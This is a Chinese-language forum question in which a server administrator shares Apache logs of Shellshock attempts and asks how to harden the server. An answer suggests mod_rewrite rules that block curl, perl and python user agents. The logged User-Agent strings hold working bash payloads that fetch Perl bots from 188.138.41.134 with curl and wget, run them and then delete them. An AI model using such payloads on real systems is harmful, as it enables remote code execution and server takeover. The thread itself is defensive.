如果发生 404 错误,我的网络服务器会给我发送电子邮件(以帮助我解决缺失的链接)。我只遇到了常见的 404 错误,例如http://www.example.com/administrator等等。
但最近我不断收到请求http://www.example.com/hello。我似乎收到了来自世界各地的请求。
185.63.188.120 - - [21/Dec/2015:08:35:54 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [21/Dec/2015:08:35:55 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [21/Dec/2015:16:17:11 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [21/Dec/2015:16:17:12 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
172.246.105.114 - - [22/Dec/2015:08:25:12 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/cax;curl -O http://188.138.41.134/cax;wget http://188.138.41.134/cax;perl /tmp/cax*;perl cax;rm -rf /tmp/cax*\""
172.246.105.114 - - [22/Dec/2015:08:25:13 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/cax;curl -O http://188.138.41.134/cax;wget http://188.138.41.134/cax;perl /tmp/cax*;perl cax;rm -rf /tmp/cax*\""
80.248.216.11 - - [22/Dec/2015:16:33:41 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/BASHSALAM;wget http://188.138.41.134/BASHSALAM -O /tmp/BASHSALAM;wget http://188.138.41.134/BASHSALAM;perl BASHSALAM;perl BASHSALAM;rm -rf /tmp/BASHSALAM*\""
80.248.216.11 - - [22/Dec/2015:16:33:42 -0500] "GET /hello HTTP/1.0" 403 1809 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/BASHSALAM;wget http://188.138.41.134/BASHSALAM -O /tmp/BASHSALAM;wget http://188.138.41.134/BASHSALAM;perl BASHSALAM;perl BASHSALAM;rm -rf /tmp/BASHSALAM*\""
185.63.188.120 - - [22/Dec/2015:22:12:45 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [22/Dec/2015:22:12:46 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [23/Dec/2015:16:56:56 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/iod.exe;curl -O http://188.138.41.134/iod.exe;wget http://188.138.41.134/iod.exe;perl /tmp/iod.exe*;perl iod.exe;rm -rf /tmp/iod.exe*\""
185.63.188.120 - - [23/Dec/2015:16:56:57 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/iod.exe;curl -O http://188.138.41.134/iod.exe;wget http://188.138.41.134/iod.exe;perl /tmp/iod.exe*;perl iod.exe;rm -rf /tmp/iod.exe*\""
我意识到这是对我的服务器(服务器已修补)的一次 shellshock 攻击尝试。
我的问题是:我该如何阻止这些类型的攻击?除了修补 bash 之外,我还应该做些什么来强化我的网络服务器?还有其他人在 Apache 日志中看到这些吗?
我发现攻击者非常狡猾,他们在 URL 中使用“hello”使得谷歌搜索答案变得非常困难。你会得到一大堆无用的结果。
答案1
如果您的系统是最新的,您不必担心。
您可以制定自定义规则来阻止大多数网络机器人攻击,例如这是我的:
RewriteCond %{HTTP_USER_AGENT} ^-?$|curl|perl|python [NC,OR]
RewriteCond %{REQUEST_METHOD} !^(GET|HEAD|POST)$ [OR]
RewriteCond %{REQUEST_URI} !^/ [OR]
RewriteCond %{HTTP_REFERER} "!^$|^http"
RewriteRule .* - [END,R=406]
它将在机器人测试漏洞之前阻止大多数攻击:
- 阻止空用户代理或怀疑代理
- 限制对 GET HEAD 和 POST 的请求
- 阻止不以 / 开头的请求(如果您不使用服务器作为代理,则所有请求都应以 / 开头)
- 阻止没有有效 REFERER 的请求
我使用代码 406,但您可以将其更改为您喜欢的任何其他代码。
如果你需要有关该漏洞的更多信息: